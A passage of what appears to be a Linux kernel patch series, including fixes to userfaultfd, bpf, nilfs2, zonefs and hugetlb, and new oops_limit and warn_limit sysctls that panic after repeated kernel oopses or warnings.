+@@ -783,6 +783,12 @@ filelayout_alloc_lseg(struct pnfs_layout_hdr *layoutid,
+ 	return &fl->generic_hdr;
+ }
+ 
++static bool
++filelayout_lseg_is_striped(const struct nfs4_filelayout_segment *flseg)
++{
++	return flseg->num_fh > 1;
++}
++
+ /*
+  * filelayout_pg_test(). Called by nfs_can_coalesce_requests()
+  *
+@@ -803,6 +809,8 @@ filelayout_pg_test(struct nfs_pageio_descriptor *pgio, struct nfs_page *prev,
+ 	size = pnfs_generic_pg_test(pgio, prev, req);
+ 	if (!size)
+ 		return 0;
++	else if (!filelayout_lseg_is_striped(FILELAYOUT_LSEG(pgio->pg_lseg)))
++		return size;
+ 
+ 	/* see if req and prev are in the same stripe */
+ 	if (prev) {
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index b9d15c3df3cc1..40ce92a332fe7 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -480,9 +480,18 @@ static int __nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
+ 	ret = nilfs_btnode_submit_block(btnc, ptr, 0, REQ_OP_READ, &bh,
+ 					&submit_ptr);
+ 	if (ret) {
+-		if (ret != -EEXIST)
+-			return ret;
+-		goto out_check;
++		if (likely(ret == -EEXIST))
++			goto out_check;
++		if (ret == -ENOENT) {
++			/*
++			 * Block address translation failed due to invalid
++			 * value of 'ptr'.  In this case, return internal code
++			 * -EINVAL (broken bmap) to notify bmap layer of fatal
++			 * metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
++		return ret;
+ 	}
+ 
+ 	if (ra) {
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 578c2bcfb1d93..63169529b52c4 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -2038,7 +2038,7 @@ int attr_punch_hole(struct ntfs_inode *ni, u64 vbo, u64 bytes, u32 *frame_size)
+ 		return -ENOENT;
+ 
+ 	if (!attr_b->non_res) {
+-		u32 data_size = le32_to_cpu(attr->res.data_size);
++		u32 data_size = le32_to_cpu(attr_b->res.data_size);
+ 		u32 from, to;
+ 
+ 		if (vbo > data_size)
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index 98ac37e34e3d4..cc694846617a5 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -108,6 +108,21 @@ static bool userfaultfd_is_initialized(struct userfaultfd_ctx *ctx)
+ 	return ctx->features & UFFD_FEATURE_INITIALIZED;
+ }
+ 
++static void userfaultfd_set_vm_flags(struct vm_area_struct *vma,
++				     vm_flags_t flags)
++{
++	const bool uffd_wp_changed = (vma->vm_flags ^ flags) & VM_UFFD_WP;
++
++	vma->vm_flags = flags;
++	/*
++	 * For shared mappings, we want to enable writenotify while
++	 * userfaultfd-wp is enabled (see vma_wants_writenotify()). We'll simply
++	 * recalculate vma->vm_page_prot whenever userfaultfd-wp changes.
++	 */
++	if ((vma->vm_flags & VM_SHARED) && uffd_wp_changed)
++		vma_set_page_prot(vma);
++}
++
+ static int userfaultfd_wake_function(wait_queue_entry_t *wq, unsigned mode,
+ 				     int wake_flags, void *key)
+ {
+@@ -618,7 +633,8 @@ static void userfaultfd_event_wait_completion(struct userfaultfd_ctx *ctx,
+ 		for_each_vma(vmi, vma) {
+ 			if (vma->vm_userfaultfd_ctx.ctx == release_new_ctx) {
+ 				vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-				vma->vm_flags &= ~__VM_UFFD_FLAGS;
++				userfaultfd_set_vm_flags(vma,
++							 vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 			}
+ 		}
+ 		mmap_write_unlock(mm);
+@@ -652,7 +668,7 @@ int dup_userfaultfd(struct vm_area_struct *vma, struct list_head *fcs)
+ 	octx = vma->vm_userfaultfd_ctx.ctx;
+ 	if (!octx || !(octx->features & UFFD_FEATURE_EVENT_FORK)) {
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-		vma->vm_flags &= ~__VM_UFFD_FLAGS;
++		userfaultfd_set_vm_flags(vma, vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 		return 0;
+ 	}
+ 
+@@ -733,7 +749,7 @@ void mremap_userfaultfd_prep(struct vm_area_struct *vma,
+ 	} else {
+ 		/* Drop uffd context if remap feature not enabled */
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-		vma->vm_flags &= ~__VM_UFFD_FLAGS;
++		userfaultfd_set_vm_flags(vma, vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 	}
+ }
+ 
+@@ -895,7 +911,7 @@ static int userfaultfd_release(struct inode *inode, struct file *file)
+ 			prev = vma;
+ 		}
+ 
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+ 	}
+ 	mmap_write_unlock(mm);
+@@ -1463,7 +1479,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
+ 		 * the next vma was merged into the current one and
+ 		 * the current one has not been updated yet.
+ 		 */
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx.ctx = ctx;
+ 
+ 		if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
+@@ -1651,7 +1667,7 @@ static int userfaultfd_unregister(struct userfaultfd_ctx *ctx,
+ 		 * the next vma was merged into the current one and
+ 		 * the current one has not been updated yet.
+ 		 */
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+ 
+ 	skip:
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index 2c53fbb8d918e..a9c5c3f720adf 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -442,6 +442,10 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 			data_size = zonefs_check_zone_condition(inode, zone,
+ 								false, false);
+ 		}
++	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
++		   data_size > isize) {
++		/* Do not expose garbage data */
++		data_size = isize;
+ 	}
+ 
+ 	/*
+@@ -805,6 +809,24 @@ static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+ 
+ 	ret = submit_bio_wait(bio);
+ 
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at zi->i_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				wpsector, zi->i_zsector);
++			ret = -EIO;
++		}
++	}
++
+ 	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+ 	trace_zonefs_file_dio_append(inode, size, ret);
+ 
+diff --git a/include/linux/panic.h b/include/linux/panic.h
+index c7759b3f20452..979b776e3bcb3 100644
+--- a/include/linux/panic.h
++++ b/include/linux/panic.h
+@@ -11,6 +11,7 @@ extern long (*panic_blink)(int state);
+ __printf(1, 2)
+ void panic(const char *fmt, ...) __noreturn __cold;
+ void nmi_panic(struct pt_regs *regs, const char *msg);
++void check_panic_on_warn(const char *origin);
+ extern void oops_enter(void);
+ extern void oops_exit(void);
+ extern bool oops_may_print(void);
+diff --git a/include/linux/soc/ti/omap1-io.h b/include/linux/soc/ti/omap1-io.h
+index f7f12728d4a63..9a60f45899d3c 100644
+--- a/include/linux/soc/ti/omap1-io.h
++++ b/include/linux/soc/ti/omap1-io.h
+@@ -5,7 +5,7 @@
+ #ifndef __ASSEMBLER__
+ #include <linux/types.h>
+ 
+-#ifdef CONFIG_ARCH_OMAP1_ANY
++#ifdef CONFIG_ARCH_OMAP1
+ /*
+  * NOTE: Please use ioremap + __raw_read/write where possible instead of these
+  */
+@@ -15,7 +15,7 @@ extern u32 omap_readl(u32 pa);
+ extern void omap_writeb(u8 v, u32 pa);
+ extern void omap_writew(u16 v, u32 pa);
+ extern void omap_writel(u32 v, u32 pa);
+-#else
++#elif defined(CONFIG_COMPILE_TEST)
+ static inline u8 omap_readb(u32 pa)  { return 0; }
+ static inline u16 omap_readw(u32 pa) { return 0; }
+ static inline u32 omap_readl(u32 pa) { return 0; }
+diff --git a/include/linux/usb.h b/include/linux/usb.h
+index 9ff1ad4dfad12..6c95af3317f73 100644
+--- a/include/linux/usb.h
++++ b/include/linux/usb.h
+@@ -751,11 +751,14 @@ extern struct device *usb_intf_get_dma_device(struct usb_interface *intf);
+ extern int usb_acpi_set_power_state(struct usb_device *hdev, int index,
+ 	bool enable);
+ extern bool usb_acpi_power_manageable(struct usb_device *hdev, int index);
++extern int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index);
+ #else
+ static inline int usb_acpi_set_power_state(struct usb_device *hdev, int index,
+ 	bool enable) { return 0; }
+ static inline bool usb_acpi_power_manageable(struct usb_device *hdev, int index)
+ 	{ return true; }
++static inline int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index)
++	{ return 0; }
+ #endif
+ 
+ /* USB autosuspend and autoresume */
+diff --git a/include/trace/events/btrfs.h b/include/trace/events/btrfs.h
+index ed50e81174bf4..5e10b5b1d16c0 100644
+--- a/include/trace/events/btrfs.h
++++ b/include/trace/events/btrfs.h
+@@ -98,7 +98,7 @@ struct raid56_bio_trace_info;
+ 	EM( FLUSH_DELALLOC_WAIT,	"FLUSH_DELALLOC_WAIT")		\
+ 	EM( FLUSH_DELALLOC_FULL,	"FLUSH_DELALLOC_FULL")		\
+ 	EM( FLUSH_DELAYED_REFS_NR,	"FLUSH_DELAYED_REFS_NR")	\
+-	EM( FLUSH_DELAYED_REFS,		"FLUSH_ELAYED_REFS")		\
++	EM( FLUSH_DELAYED_REFS,		"FLUSH_DELAYED_REFS")		\
+ 	EM( ALLOC_CHUNK,		"ALLOC_CHUNK")			\
+ 	EM( ALLOC_CHUNK_FORCE,		"ALLOC_CHUNK_FORCE")		\
+ 	EM( RUN_DELAYED_IPUTS,		"RUN_DELAYED_IPUTS")		\
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index f2f9f174fc620..ab5ae475840f4 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -281,8 +281,12 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 			 * to the waitqueue, so if we get nothing back, we
+ 			 * should be safe and attempt a reissue.
+ 			 */
+-			if (unlikely(!req->cqe.res))
++			if (unlikely(!req->cqe.res)) {
++				/* Multishot armed need not reissue */
++				if (!(req->apoll_events & EPOLLONESHOT))
++					continue;
+ 				return IOU_POLL_REISSUE;
++			}
+ 		}
+ 		if (req->apoll_events & EPOLLONESHOT)
+ 			return IOU_POLL_DONE;
+diff --git a/kernel/bpf/offload.c b/kernel/bpf/offload.c
+index 13e4efc971e6d..190d9f9dc9870 100644
+--- a/kernel/bpf/offload.c
++++ b/kernel/bpf/offload.c
+@@ -216,9 +216,6 @@ static void __bpf_prog_offload_destroy(struct bpf_prog *prog)
+ 	if (offload->dev_state)
+ 		offload->offdev->ops->destroy(prog);
+ 
+-	/* Make sure BPF_PROG_GET_NEXT_ID can't find this dead program */
+-	bpf_prog_free_id(prog, true);
+-
+ 	list_del_init(&offload->offloads);
+ 	kfree(offload);
+ 	prog->aux->offload = NULL;
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 439ed7e5a82b8..6c61dba26f4d9 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -1958,7 +1958,7 @@ static void bpf_audit_prog(const struct bpf_prog *prog, unsigned int op)
+ 		return;
+ 	if (audit_enabled == AUDIT_OFF)
+ 		return;
+-	if (op == BPF_AUDIT_LOAD)
++	if (!in_irq() && !irqs_disabled())
+ 		ctx = audit_context();
+ 	ab = audit_log_start(ctx, GFP_ATOMIC, AUDIT_BPF);
+ 	if (unlikely(!ab))
+@@ -2053,6 +2053,7 @@ static void bpf_prog_put_deferred(struct work_struct *work)
+ 	prog = aux->prog;
+ 	perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_UNLOAD, 0);
+ 	bpf_audit_prog(prog, BPF_AUDIT_UNLOAD);
++	bpf_prog_free_id(prog, true);
+ 	__bpf_prog_put_noref(prog, true);
+ }
+ 
+@@ -2061,9 +2062,6 @@ static void __bpf_prog_put(struct bpf_prog *prog, bool do_idr_lock)
+ 	struct bpf_prog_aux *aux = prog->aux;
+ 
+ 	if (atomic64_dec_and_test(&aux->refcnt)) {
+-		/* bpf_prog_free_id() must be called first */
+-		bpf_prog_free_id(prog, do_idr_lock);
+-
+ 		if (in_irq() || irqs_disabled()) {
+ 			INIT_WORK(&aux->work, bpf_prog_put_deferred);
+ 			schedule_work(&aux->work);
+diff --git a/kernel/bpf/task_iter.c b/kernel/bpf/task_iter.c
+index c2a2182ce5702..c4ab9d6cdbe9c 100644
+--- a/kernel/bpf/task_iter.c
++++ b/kernel/bpf/task_iter.c
+@@ -438,6 +438,7 @@ struct bpf_iter_seq_task_vma_info {
+ 	 */
+ 	struct bpf_iter_seq_task_common common;
+ 	struct task_struct *task;
++	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	u32 tid;
+ 	unsigned long prev_vm_start;
+@@ -456,16 +457,19 @@ task_vma_seq_get_next(struct bpf_iter_seq_task_vma_info *info)
+ 	enum bpf_task_vma_iter_find_op op;
+ 	struct vm_area_struct *curr_vma;
+ 	struct task_struct *curr_task;
++	struct mm_struct *curr_mm;
+ 	u32 saved_tid = info->tid;
+ 
+ 	/* If this function returns a non-NULL vma, it holds a reference to
+-	 * the task_struct, and holds read lock on vma->mm->mmap_lock.
++	 * the task_struct, holds a refcount on mm->mm_users, and holds
++	 * read lock on vma->mm->mmap_lock.
+ 	 * If this function returns NULL, it does not hold any reference or
+ 	 * lock.
+ 	 */
+ 	if (info->task) {
+ 		curr_task = info->task;
+ 		curr_vma = info->vma;
++		curr_mm = info->mm;
+ 		/* In case of lock contention, drop mmap_lock to unblock
+ 		 * the writer.
+ 		 *
+@@ -504,13 +508,15 @@ task_vma_seq_get_next(struct bpf_iter_seq_task_vma_info *info)
+ 		 *    4.2) VMA2 and VMA2' covers different ranges, process
+ 		 *         VMA2'.
+ 		 */
+-		if (mmap_lock_is_contended(curr_task->mm)) {
++		if (mmap_lock_is_contended(curr_mm)) {
+ 			info->prev_vm_start = curr_vma->vm_start;
+ 			info->prev_vm_end = curr_vma->vm_end;
+ 			op = task_vma_iter_find_vma;
+-			mmap_read_unlock(curr_task->mm);
+-			if (mmap_read_lock_killable(curr_task->mm))
++			mmap_read_unlock(curr_mm);
++			if (mmap_read_lock_killable(curr_mm)) {
++				mmput(curr_mm);
+ 				goto finish;
++			}
+ 		} else {
+ 			op = task_vma_iter_next_vma;
+ 		}
+@@ -535,42 +541,47 @@ again:
+ 			op = task_vma_iter_find_vma;
+ 		}
+ 
+-		if (!curr_task->mm)
++		curr_mm = get_task_mm(curr_task);
++		if (!curr_mm)
+ 			goto next_task;
+ 
+-		if (mmap_read_lock_killable(curr_task->mm))
++		if (mmap_read_lock_killable(curr_mm)) {
++			mmput(curr_mm);
+ 			goto finish;
++		}
+ 	}
+ 
+ 	switch (op) {
+ 	case task_vma_iter_first_vma:
+-		curr_vma = find_vma(curr_task->mm, 0);
++		curr_vma = find_vma(curr_mm, 0);
+ 		break;
+ 	case task_vma_iter_next_vma:
+-		curr_vma = find_vma(curr_task->mm, curr_vma->vm_end);
++		curr_vma = find_vma(curr_mm, curr_vma->vm_end);
+ 		break;
+ 	case task_vma_iter_find_vma:
+ 		/* We dropped mmap_lock so it is necessary to use find_vma
+ 		 * to find the next vma. This is similar to the  mechanism
+ 		 * in show_smaps_rollup().
+ 		 */
+-		curr_vma = find_vma(curr_task->mm, info->prev_vm_end - 1);
++		curr_vma = find_vma(curr_mm, info->prev_vm_end - 1);
+ 		/* case 1) and 4.2) above just use curr_vma */
+ 
+ 		/* check for case 2) or case 4.1) above */
+ 		if (curr_vma &&
+ 		    curr_vma->vm_start == info->prev_vm_start &&
+ 		    curr_vma->vm_end == info->prev_vm_end)
+-			curr_vma = find_vma(curr_task->mm, curr_vma->vm_end);
++			curr_vma = find_vma(curr_mm, curr_vma->vm_end);
+ 		break;
+ 	}
+ 	if (!curr_vma) {
+ 		/* case 3) above, or case 2) 4.1) with vma->next == NULL */
+-		mmap_read_unlock(curr_task->mm);
++		mmap_read_unlock(curr_mm);
++		mmput(curr_mm);
+ 		goto next_task;
+ 	}
+ 	info->task = curr_task;
+ 	info->vma = curr_vma;
++	info->mm = curr_mm;
+ 	return curr_vma;
+ 
+ next_task:
+@@ -579,6 +590,7 @@ next_task:
+ 
+ 	put_task_struct(curr_task);
+ 	info->task = NULL;
++	info->mm = NULL;
+ 	info->tid++;
+ 	goto again;
+ 
+@@ -587,6 +599,7 @@ finish:
+ 		put_task_struct(curr_task);
+ 	info->task = NULL;
+ 	info->vma = NULL;
++	info->mm = NULL;
+ 	return NULL;
+ }
+ 
+@@ -658,7 +671,9 @@ static void task_vma_seq_stop(struct seq_file *seq, void *v)
+ 		 */
+ 		info->prev_vm_start = ~0UL;
+ 		info->prev_vm_end = info->vma->vm_end;
+-		mmap_read_unlock(info->task->mm);
++		mmap_read_unlock(info->mm);
++		mmput(info->mm);
++		info->mm = NULL;
+ 		put_task_struct(info->task);
+ 		info->task = NULL;
+ 	}
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315c..15dc2ec80c467 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -67,11 +67,58 @@
+ #include <linux/io_uring.h>
+ #include <linux/kprobes.h>
+ #include <linux/rethook.h>
++#include <linux/sysfs.h>
+ 
+ #include <linux/uaccess.h>
+ #include <asm/unistd.h>
+ #include <asm/mmu_context.h>
+ 
++/*
++ * The default value should be high enough to not crash a system that randomly
++ * crashes its kernel from time to time, but low enough to at least not permit
++ * overflowing 32-bit refcounts or the ldsem writer count.
++ */
++static unsigned int oops_limit = 10000;
++
++#ifdef CONFIG_SYSCTL
++static struct ctl_table kern_exit_table[] = {
++	{
++		.procname       = "oops_limit",
++		.data           = &oops_limit,
++		.maxlen         = sizeof(oops_limit),
++		.mode           = 0644,
++		.proc_handler   = proc_douintvec,
++	},
++	{ }
++};
++
++static __init int kernel_exit_sysctls_init(void)
++{
++	register_sysctl_init("kernel", kern_exit_table);
++	return 0;
++}
++late_initcall(kernel_exit_sysctls_init);
++#endif
++
++static atomic_t oops_count = ATOMIC_INIT(0);
++
++#ifdef CONFIG_SYSFS
++static ssize_t oops_count_show(struct kobject *kobj, struct kobj_attribute *attr,
++			       char *page)
++{
++	return sysfs_emit(page, "%d\n", atomic_read(&oops_count));
++}
++
++static struct kobj_attribute oops_count_attr = __ATTR_RO(oops_count);
++
++static __init int kernel_exit_sysfs_init(void)
++{
++	sysfs_add_file_to_group(kernel_kobj, &oops_count_attr.attr, NULL);
++	return 0;
++}
++late_initcall(kernel_exit_sysfs_init);
++#endif
++
+ static void __unhash_process(struct task_struct *p, bool group_dead)
+ {
+ 	nr_threads--;
+@@ -884,6 +931,7 @@ void __noreturn make_task_dead(int signr)
+ 	 * Then do everything else.
+ 	 */
+ 	struct task_struct *tsk = current;
++	unsigned int limit;
+ 
+ 	if (unlikely(in_interrupt()))
+ 		panic("Aiee, killing interrupt handler!");
+@@ -897,6 +945,20 @@ void __noreturn make_task_dead(int signr)
+ 		preempt_count_set(PREEMPT_ENABLED);
+ 	}
+ 
++	/*
++	 * Every time the system oopses, if the oops happens while a reference
++	 * to an object was held, the reference leaks.
++	 * If the oops doesn't also leak memory, repeated oopsing can cause
++	 * reference counters to wrap around (if they're not using refcount_t).
++	 * This means that repeated oopsing can make unexploitable-looking bugs
++	 * exploitable through repeated oopsing.
++	 * To make sure this can't happen, place an upper bound on how often the
++	 * kernel may oops without panic().
++	 */
++	limit = READ_ONCE(oops_limit);
++	if (atomic_inc_return(&oops_count) >= limit && limit)
++		panic("Oopsed too often (kernel.oops_limit is %d)", limit);
++
+ 	/*
+ 	 * We're taking recursive faults here in make_task_dead. Safest is to just
+ 	 * leave this task alone and wait for reboot.
+diff --git a/kernel/kcsan/report.c b/kernel/kcsan/report.c
+index 67794404042a5..e95ce7d7a76e7 100644
+--- a/kernel/kcsan/report.c
++++ b/kernel/kcsan/report.c
+@@ -492,8 +492,7 @@ static void print_report(enum kcsan_value_change value_change,
+ 	dump_stack_print_info(KERN_DEFAULT);
+ 	pr_err("==================================================================\n");
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("KCSAN");
+ }
+ 
+ static void release_report(unsigned long *flags, struct other_info *other_info)
+diff --git a/kernel/panic.c b/kernel/panic.c
+index da323209f5833..7834c9854e026 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -32,6 +32,7 @@
+ #include <linux/bug.h>
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
++#include <linux/sysfs.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -58,6 +59,7 @@ bool crash_kexec_post_notifiers;
+ int panic_on_warn __read_mostly;
+ unsigned long panic_on_taint;
+ bool panic_on_taint_nousertaint = false;
++static unsigned int warn_limit __read_mostly;
+ 
+ int panic_timeout = CONFIG_PANIC_TIMEOUT;
+ EXPORT_SYMBOL_GPL(panic_timeout);
+@@ -75,8 +77,9 @@ ATOMIC_NOTIFIER_HEAD(panic_notifier_list);
+ 
+ EXPORT_SYMBOL(panic_notifier_list);
+ 
+-#if defined(CONFIG_SMP) && defined(CONFIG_SYSCTL)
++#ifdef CONFIG_SYSCTL
+ static struct ctl_table kern_panic_table[] = {
++#ifdef CONFIG_SMP
+ 	{
+ 		.procname       = "oops_all_cpu_backtrace",
+ 		.data           = &sysctl_oops_all_cpu_backtrace,
+@@ -86,6 +89,14 @@ static struct ctl_table kern_panic_table[] = {
+ 		.extra1         = SYSCTL_ZERO,
+ 		.extra2         = SYSCTL_ONE,
+ 	},
++#endif
++	{
++		.procname       = "warn_limit",
++		.data           = &warn_limit,
++		.maxlen         = sizeof(warn_limit),
++		.mode           = 0644,
++		.proc_handler   = proc_douintvec,
++	},
+ 	{ }
+ };
+ 
+@@ -97,6 +108,25 @@ static __init int kernel_panic_sysctls_init(void)
+ late_initcall(kernel_panic_sysctls_init);
+ #endif
+ 
++static atomic_t warn_count = ATOMIC_INIT(0);
++
++#ifdef CONFIG_SYSFS
++static ssize_t warn_count_show(struct kobject *kobj, struct kobj_attribute *attr,
++			       char *page)
++{
++	return sysfs_emit(page, "%d\n", atomic_read(&warn_count));
++}
++
++static struct kobj_attribute warn_count_attr = __ATTR_RO(warn_count);
++
++static __init int kernel_panic_sysfs_init(void)
++{
++	sysfs_add_file_to_group(kernel_kobj, &warn_count_attr.attr, NULL);
++	return 0;
++}
++late_initcall(kernel_panic_sysfs_init);
++#endif
++
+ static long no_blink(int state)
+ {
+ 	return 0;
+@@ -199,6 +229,19 @@ static void panic_print_sys_info(bool console_flush)
+ 		ftrace_dump(DUMP_ALL);
+ }
+ 
++void check_panic_on_warn(const char *origin)
++{
++	unsigned int limit;
++
++	if (panic_on_warn)
++		panic("%s: panic_on_warn set ...\n", origin);
++
++	limit = READ_ONCE(warn_limit);
++	if (atomic_inc_return(&warn_count) >= limit && limit)
++		panic("%s: system warned too often (kernel.warn_limit is %d)",
++		      origin, limit);
++}
++
+ /**
+  *	panic - halt the system
+  *	@fmt: The text string to print
+@@ -617,8 +660,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ 	if (regs)
+ 		show_regs(regs);
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("kernel");
+ 
+ 	if (!regs)
+ 		dump_stack();
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 172ec79b66f6c..f730b6fe94a7f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -5778,8 +5778,7 @@ static noinline void __schedule_bug(struct task_struct *prev)
+ 		pr_err("Preemption disabled at:");
+ 		print_ip_sym(KERN_ERR, preempt_disable_ip);
+ 	}
+-	if (panic_on_warn)
+-		panic("scheduling while atomic\n");
++	check_panic_on_warn("scheduling while atomic");
+ 
+ 	dump_stack();
+ 	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 5fd54bf0e8867..88b31f096fb2d 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -1442,6 +1442,8 @@ static int do_prlimit(struct task_struct *tsk, unsigned int resource,
+ 
+ 	if (resource >= RLIM_NLIMITS)
+ 		return -EINVAL;
++	resource = array_index_nospec(resource, RLIM_NLIMITS);
++
+ 	if (new_rlim) {
+ 		if (new_rlim->rlim_cur > new_rlim->rlim_max)
+ 			return -EINVAL;
+diff --git a/lib/ubsan.c b/lib/ubsan.c
+index 36bd75e334263..60c7099857a05 100644
+--- a/lib/ubsan.c
++++ b/lib/ubsan.c
+@@ -154,8 +154,7 @@ static void ubsan_epilogue(void)
+ 
+ 	current->in_ubsan--;
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("UBSAN");
+ }
+ 
+ void __ubsan_handle_divrem_overflow(void *_data, void *lhs, void *rhs)
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 9c251faeb6f59..52475c4262e45 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -94,6 +94,8 @@ static int hugetlb_acct_memory(struct hstate *h, long delta);
+ static void hugetlb_vma_lock_free(struct vm_area_struct *vma);
+ static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma);
+ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma);
++static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
++		unsigned long start, unsigned long end);
+ 
+ static inline bool subpool_is_free(struct hugepage_subpool *spool)
+ {
+@@ -4825,6 +4827,25 @@ static int hugetlb_vm_op_split(struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	if (addr & ~(huge_page_mask(hstate_vma(vma))))
+ 		return -EINVAL;
++
++	/*
++	 * PMD sharing is only possible for PUD_SIZE-aligned address ranges
++	 * in HugeTLB VMAs. If we will lose PUD_SIZE alignment due to this
++	 * split, unshare PMDs in the PUD_SIZE interval surrounding addr now.
++	 */
++	if (addr & ~PUD_MASK) {
++		/*
++		 * hugetlb_vm_op_split is called right before we attempt to
++		 * split the VMA. We will need to unshare PMDs in the old and
++		 * new VMAs, so let's unshare before we split.
++		 */
++		unsigned long floor = addr & PUD_MASK;
++		unsigned long ceil = floor + PUD_SIZE;
++
++		if (floor >= vma->vm_start && ceil <= vma->vm_end)
++			hugetlb_unshare_pmds(vma, floor, ceil);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -6583,8 +6604,17 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 		spinlock_t *ptl;
+ 		ptep = huge_pte_offset(mm, address, psize);
+ 		if (!ptep) {
+-			address |= last_addr_mask;
+-			continue;
++			if (!uffd_wp) {
++				address |= last_addr_mask;
++				continue;
++			}
++			/*
++			 * Userfaultfd wr-protect requires pgtable
++			 * pre-allocations to install pte markers.
++			 */
++			ptep = huge_pte_alloc(mm, vma, address, psize);
++			if (!ptep)
++				break;
+ 		}
+ 		ptl = huge_pte_lock(h, mm, ptep);
+ 		if (huge_pmd_unshare(mm, vma, address, ptep)) {
+@@ -6602,16 +6632,13 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 		}
+ 		pte = huge_ptep_get(ptep);
+ 		if (unlikely(is_hugetlb_entry_hwpoisoned(pte))) {
+-			spin_unlock(ptl);
+-			continue;
+-		}
+-		if (unlikely(is_hugetlb_entry_migration(pte))) {
++			/* Nothing to do. */
++		} else if (unlikely(is_hugetlb_entry_migration(pte))) {
+ 			swp_entry_t entry = pte_to_swp_entry(pte);
+ 			struct page *page = pfn_swap_entry_to_page(entry);
++			pte_t newpte = pte;
+ 
+-			if (!is_readable_migration_entry(entry)) {
+-				pte_t newpte;
+-
++			if (is_writable_migration_entry(entry)) {
+ 				if (PageAnon(page))
+ 					entry = make_readable_exclusive_migration_entry(
+ 								swp_offset(entry));
+@@ -6619,25 +6646,22 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 					entry = make_readable_migration_entry(
+ 								swp_offset(entry));
+ 				newpte = swp_entry_to_pte(entry);
+-				if (uffd_wp)
+-					newpte = pte_swp_mkuffd_wp(newpte);
+-				else if (uffd_wp_resolve)
+-					newpte = pte_swp_clear_uffd_wp(newpte);
+-				set_huge_pte_at(mm, address, ptep, newpte);
+ 				pages++;
+ 			}
+-			spin_unlock(ptl);
+-			continue;
+-		}
+-		if (unlikely(pte_marker_uffd_wp(pte))) {
+-			/*
+-			 * This is changing a non-present pte into a none pte,
+-			 * no need for huge_ptep_modify_prot_start/commit().
+-			 */
++
++			if (uffd_wp)
++				newpte = pte_swp_mkuffd_wp(newpte);
++			else if (uffd_wp_resolve)
++				newpte = pte_swp_clear_uffd_wp(newpte);
++			if (!pte_same(pte, newpte))
++				set_huge_pte_at(mm, address, ptep, newpte);
++		} else if (unlikely(is_pte_marker(pte))) {
